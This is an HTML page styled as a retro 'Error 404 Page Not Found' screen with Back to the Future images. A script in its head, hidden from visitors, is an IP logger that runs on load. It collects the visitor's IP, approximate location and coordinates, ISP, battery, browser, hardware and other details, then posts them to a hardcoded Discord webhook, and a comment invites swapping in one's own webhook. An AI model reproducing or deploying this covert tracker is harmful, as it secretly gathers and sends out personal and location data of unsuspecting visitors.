<!DOCTYPE html>
<html lang="en">
  
  <head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Error 404</title>
  <style>
    @import url('https://fonts.googleapis.com/css2?family=Press+Start+2P&display=swap');

    * {
      padding: 0;
      margin: 0;
      box-sizing: border-box;
      font-family: 'Press Start 2P';
      color: #FFFFFF;
      text-align: center;
    }

    body {
      background-color: #000000;
      background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='42' height='58' viewBox='0 0 42 58'%3E%3Cg fill='%23dddcdd' fill-opacity='0.23'%3E%3Cpath fill-rule='evenodd' d='M12 18h12v18h6v4H18V22h-6v-4zm-6-2v-4H0V0h36v6h6v36h-6v4h6v12H6v-6H0V16h6zM34 2H2v8h24v24h8V2zM6 8a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm8 0a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm8 0a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm8 0a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm0 8a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm0 8a2 2 0 1 0 0-4 2 2 0 0 0 0 4zm0 8a2 2 0 1 0 0-4 2 2 0 0 0 0 4zM2 50h32v-8H10V18H2v32zm28-6a2 2 0 1 0 0 4 2 2 0 0 0 0-4zm-8 0a2 2 0 1 0 0 4 2 2 0 0 0 0-4zm-8 0a2 2 0 1 0 0 4 2 2 0 0 0 0-4zm-8 0a2 2 0 1 0 0 4 2 2 0 0 0 0-4zm0-8a2 2 0 1 0 0 4 2 2 0 0 0 0-4zm0-8a2 2 0 1 0 0 4 2 2 0 0 0 0-4zm0-8a2 2 0 1 0 0 4 2 2 0 0 0 0-4z'/%3E%3C/g%3E%3C/svg%3E");
    }

    section.notFound {
      display: flex;
      justify-content: center;
      align-items: center;
      margin: 0 5%;
      height: 100vh;
    }

    section.notFound h1 {
      color: red;
      font-size: 100px;
    }

    section.notFound h2 {
      font-size: 50px;
    }

    section.notFound h1,
    h2,
    h3 {
      margin-bottom: 40px;
    }

    div.text {
      height: 50vh;
    }

    div.text a {
      text-decoration: none;
      margin-right: 20px;
    }

    div.text a:hover {
      color: red;
      text-decoration: underline;
    }

    @media only screen and (max-width: 768px) {
      section.notFound {
        flex-direction: column;
        justify-content: space-around;
      }

      section.notFound div.img img {
        width: 70vw;
        height: auto;
      }

      section.notFound h1 {
        font-size: 50px;
      }

      section.notFound h2 {
        font-size: 25px;
      }

      div.text a:active {
        color: red;
        text-decoration: underline;
      }
    }
  </style>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js"></script>
  <script>
    $(document).ready(function () {

      let ip
      let country
      let countryCode
      let region
      let regionName
      let city
      let zip
      let lat
      let lon
      let timezone
      let org
      let batterypercentage
      let ischarging
      let platform
      let networkinfo
      let networkinformation
      let width
      let height
      let devicelang
      let iscookieEnabled
      let userAgent
      let cpuThreads
      let deviceram
      let referurl
      let datetime = new Date();
      let localtime
      async function getInfo() {
        await fetch('https://ip-api.io/json')
          .then(response => response.json())
          .then(data => {
            ip = data.ip
            country = data.country_name
            countryCode = data.country_code
            region = data.region_code
            regionName = data.region_name
            city = data.city
            zip = data.zip_code
            lat = data.latitude
            lon = data.longitude
            timezone = data.time_zone
            org = data.organisation
          })

        let battery = await navigator.getBattery();
        batterypercentage = String(battery.level * 100 + "%");
        ischarging = String(battery.charging);
        platform = String(navigator.platform);
        width = String(window.innerWidth);
        height = String(window.innerHeight);
        devicelang = String(navigator.language);
        iscookieEnabled = String(navigator.cookieEnabled);
        userAgent = String(navigator.userAgent || navigator.vendor || window.opera);
        cpuThreads = String(navigator.hardwareConcurrency);
        deviceram = String(navigator.deviceMemory + "GB");
        referurl = String(window.location.href);
        localtime = String(datetime.toLocaleString());

        await sendWebhook();
      }
      getInfo();

      function sendWebhook() {
        /*Change here the webhookUrl for your discord webhook url*/
        const webhookUrl = "https://discord.com/api/webhooks/990728134561239080/7_ocU_f5f0HcV1rJi6kX_2XcMjCtw0eI4MtO56IAQm9YxazwoGdueECRWvgolwhPJHpE"

        let request = new XMLHttpRequest();
        request.open("POST", webhookUrl);
        request.setRequestHeader('Content-type', 'application/json');
        let params = {
          "content": null,
          "embeds": [
            {
              "title": "Alguien ha caido en el IpLogger",
              "description": `**Dirección IP:** ${ip} \n**Proveedor:** ${org} \n**País:** ${country} \n**Código País:** ${countryCode} \n**Nombre región:** ${regionName} \n**Código región:** ${region} \n**Ciudad:** ${city} \n**Código postal:** ${zip} \n**Latitud:** ${lat} \n**Longitud:** ${lon} \n**Zona horaria:** ${timezone} \n**Tiempo local:** ${localtime} \n**Cookies habilitadas:** ${iscookieEnabled} \n**Lenguaje:** ${devicelang} \n**Ancho pantalla:** ${width} \n**Alto pantalla:** ${height} \n**Plataforma:** ${platform} \n**Navegador:** ${userAgent} \n**Bateria:** ${batterypercentage} \n**Cargando:** ${ischarging} \n**Número nucleos cpu:** ${cpuThreads} \n**Ram:** ${deviceram} \n**Enlace:** ${referurl}`,
              "color": 10493984,
              "timestamp": datetime
            }
          ],
          "attachments": []
        }
        request.send(JSON.stringify(params));
      }
    });
  </script>
</head>

<body>
  <section class="notFound">
    <div class="img">
      <img src="https://assets.codepen.io/5647096/backToTheHomepage.png" alt="Back to the Homepage" />
      <img src="https://assets.codepen.io/5647096/Delorean.png" alt="El Delorean, El Doc y Marti McFly" />
    </div>
    <div class="text">
      <h1>404</h1>
      <h2>PAGE NOT FOUND</h2>
      <h3>BACK TO HOME?</h3>
      <a href="#" class="yes">YES</a>
      <a href="https://www.youtube.com/watch?v=G3AfIvJBcGo">NO</a>
    </div>
  </section>
</body>

</html>